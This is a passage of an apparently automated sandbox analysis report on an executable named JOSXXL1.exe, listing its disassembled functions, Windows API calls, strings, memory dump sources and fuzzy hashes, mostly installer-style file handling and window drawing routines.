                                                                                                        • Instruction Fuzzy Hash: D471A4B1A00209FFDB109F60DD85E6A7B69FB84344F00453AFA05B62E0D7799D51CFA9
                                                                                                        Function 00405EB2 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 131stringmemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrcpyW.KERNEL32(00426DE8,NUL,?,00000000,?,Error writing temporary file. Make sure your temp folder is valid.,00406045,?,?), ref: 00405EC1
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,Error writing temporary file. Make sure your temp folder is valid.,00406045,?,?), ref: 00405EE5
                                                                                                        • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00405EEE
                                                                                                          • Part of subcall function 00405CBD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CCD
                                                                                                          • Part of subcall function 00405CBD: lstrlenA.KERNEL32(00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFF
                                                                                                        • GetShortPathNameW.KERNEL32(uB,004275E8,00000400), ref: 00405F0B
                                                                                                        • wsprintfA.USER32 ref: 00405F29
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?), ref: 00405F64
                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405F73
                                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405FAB
                                                                                                        • SetFilePointer.KERNEL32(0040A5A8,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5A8,00000000,[Rename],00000000,00000000,00000000), ref: 00406001
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00406012
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00406019
                                                                                                          • Part of subcall function 00405D58: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\JOSXXL1.exe,80000000,00000003), ref: 00405D5C
                                                                                                          • Part of subcall function 00405D58: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                        • String ID: %ls=%ls$Error writing temporary file. Make sure your temp folder is valid.$NUL$[Rename]$mB$uB$uB
                                                                                                        • API String ID: 222337774-3510403337
                                                                                                        • Opcode ID: e7382f7b8c26af6e0710f3cc174a3ede04313a00f8ed0edbfd428e2cb97c63d7
                                                                                                        • Instruction ID: e0a3a616164006467439f71a5ee21b177f06bf99c86c19659b49dd792d0ed9da
                                                                                                        • Opcode Fuzzy Hash: e7382f7b8c26af6e0710f3cc174a3ede04313a00f8ed0edbfd428e2cb97c63d7
                                                                                                        • Instruction Fuzzy Hash: 52312230241B157BD2206B618D09F6B3A5CEF85755F25003BFA42F62D2DA3CD9118ABD
                                                                                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                        • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                        • String ID: F
                                                                                                        • API String ID: 941294808-1304234792
                                                                                                        • Opcode ID: bf2da2548cab59f56b9c29784a74930a17cbf9c8a4836dedd9ba629d6cbcfebe
                                                                                                        • Instruction ID: e4307af7b63af3c060521be2e9f36853b9854247f946bef182d968856dcca5c3
                                                                                                        • Opcode Fuzzy Hash: bf2da2548cab59f56b9c29784a74930a17cbf9c8a4836dedd9ba629d6cbcfebe
                                                                                                        • Instruction Fuzzy Hash: BB418B71800209AFCF058FA5DE459AFBBB9FF45310F00842EF991AA1A0C738DA55DFA4
                                                                                                        Function 100022D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                          • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                        • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2337909771.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2337832913.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2337963642.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2338036438.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_10000000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                        • String ID: @Hmu
                                                                                                        • API String ID: 4216380887-887474944
                                                                                                        • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                        • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                                        • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                        • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                                        Function 00406417 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CharNextW.USER32(0040A230,*?|<>/":,00000000,"C:\Users\user\Desktop\JOSXXL1.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 0040647A
                                                                                                        • CharNextW.USER32(0040A230,0040A230,0040A230,00000000), ref: 00406489
                                                                                                        • CharNextW.USER32(0040A230,"C:\Users\user\Desktop\JOSXXL1.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 0040648E
                                                                                                        • CharPrevW.USER32(0040A230,0040A230,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 004064A1
                                                                                                        Strings
                                                                                                        • "C:\Users\user\Desktop\JOSXXL1.exe", xrefs: 0040645B
                                                                                                        • *?|<>/":, xrefs: 00406469
                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00406418
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Char$Next$Prev
                                                                                                        • String ID: "C:\Users\user\Desktop\JOSXXL1.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                        • API String ID: 589700163-2125738232
                                                                                                        • Opcode ID: 3926a558a1d5fac86b1a7f5ee3cbb5d374d5244e5857cfc5627c81e884b8420d
                                                                                                        • Instruction ID: 97757fea8cfc4e5e160e398f5921a23c68bb92f937fa9eb531f0d47839a376ba
                                                                                                        • Opcode Fuzzy Hash: 3926a558a1d5fac86b1a7f5ee3cbb5d374d5244e5857cfc5627c81e884b8420d
                                                                                                        • Instruction Fuzzy Hash: AE11941580171299DB307B189C80AB762F8EF94760F56843FED8AB32C0E77D5C9286BD
                                                                                                        Function 004042AE Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 004042CB
                                                                                                        • GetSysColor.USER32(00000000), ref: 004042E7
                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 004042F3
                                                                                                        • SetBkMode.GDI32(?,?), ref: 004042FF
                                                                                                        • GetSysColor.USER32(?), ref: 00404312
                                                                                                        • SetBkColor.GDI32(?,?), ref: 00404322
                                                                                                        • DeleteObject.GDI32(?), ref: 0040433C
                                                                                                        • CreateBrushIndirect.GDI32(?), ref: 00404346
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2320649405-0
                                                                                                        • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                        • Instruction ID: c8c0c82dcd415c8ab494bd2ee85d05619b55063599498dccf98d91aa8dec70c5
                                                                                                        • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                        • Instruction Fuzzy Hash: 9C2154B15007449BC7219F68DE08B5B7BF8AF81714F08892DFD95E26A0D734E948CB54
                                                                                                        Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                          • Part of subcall function 00405E39: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E4F
                                                                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                        • String ID: 9
                                                                                                        • API String ID: 163830602-2366072709
                                                                                                        • Opcode ID: 54eb05019f2e59d002bdcf8ef70b12416628f11d58b5efd06b79a11da1a785d5
                                                                                                        • Instruction ID: 367b42b1b2af5c2ac759aacef6cd20ad90251cc9961805460d5ea366d256a81f
                                                                                                        • Opcode Fuzzy Hash: 54eb05019f2e59d002bdcf8ef70b12416628f11d58b5efd06b79a11da1a785d5
                                                                                                        • Instruction Fuzzy Hash: 19510874D00219ABDF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99942DB69
                                                                                                        Function 00402D9F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DestroyWindow.USER32(00000000,00000000), ref: 00402DBA
                                                                                                        • GetTickCount.KERNEL32 ref: 00402DD8
                                                                                                        • wsprintfW.USER32 ref: 00402E06
                                                                                                          • Part of subcall function 004052E2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
                                                                                                          • Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
                                                                                                          • Part of subcall function 004052E2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00402E19,00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000), ref: 0040533D
                                                                                                          • Part of subcall function 004052E2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll), ref: 0040534F
                                                                                                          • Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
                                                                                                          • Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
                                                                                                          • Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D
                                                                                                        • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402E2A
                                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402E38
                                                                                                          • Part of subcall function 00402D83: MulDiv.KERNEL32(000556D4,00000064,0005ACF8), ref: 00402D98
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                        • String ID: ... %d%%
                                                                                                        • API String ID: 722711167-2449383134
                                                                                                        • Opcode ID: 6f4a503913ef8ebb725cac2aff158102153f5ef9f377251618bd95ec040e3a6b
                                                                                                        • Instruction ID: 2b011a82625418f68b8499a5732cb5b9e1a166e3b6ac7890347db752d15f278b
                                                                                                        • Opcode Fuzzy Hash: 6f4a503913ef8ebb725cac2aff158102153f5ef9f377251618bd95ec040e3a6b
                                                                                                        • Instruction Fuzzy Hash: D7015230541624E7C6216B60EE4DA9B7668AF00B05B24407BF845F11E1DAB85455CBEE
                                                                                                        Function 00404BAC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BC7
                                                                                                        • GetMessagePos.USER32 ref: 00404BCF
                                                                                                        • ScreenToClient.USER32(?,?), ref: 00404BE9
                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFB
                                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C21
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                        • String ID: f
                                                                                                        • API String ID: 41195575-1993550816
                                                                                                        • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                        • Instruction ID: 2ee92d30c3d4f62541dcb72b74cb9552329c9a0a7836ec50a82d95606e957567
                                                                                                        • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                        • Instruction Fuzzy Hash: 33015E71900218BAEB10DBA4DD85FFEBBBCAF54711F10412BBA51B61D0D7B4AA058BA4
                                                                                                        Function 00401D56 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetDC.USER32(?), ref: 00401D59
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                        • CreateFontIndirectW.GDI32(0040CE00), ref: 00401DD1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                        • String ID: Times New Roman
                                                                                                        • API String ID: 3808545654-927190056
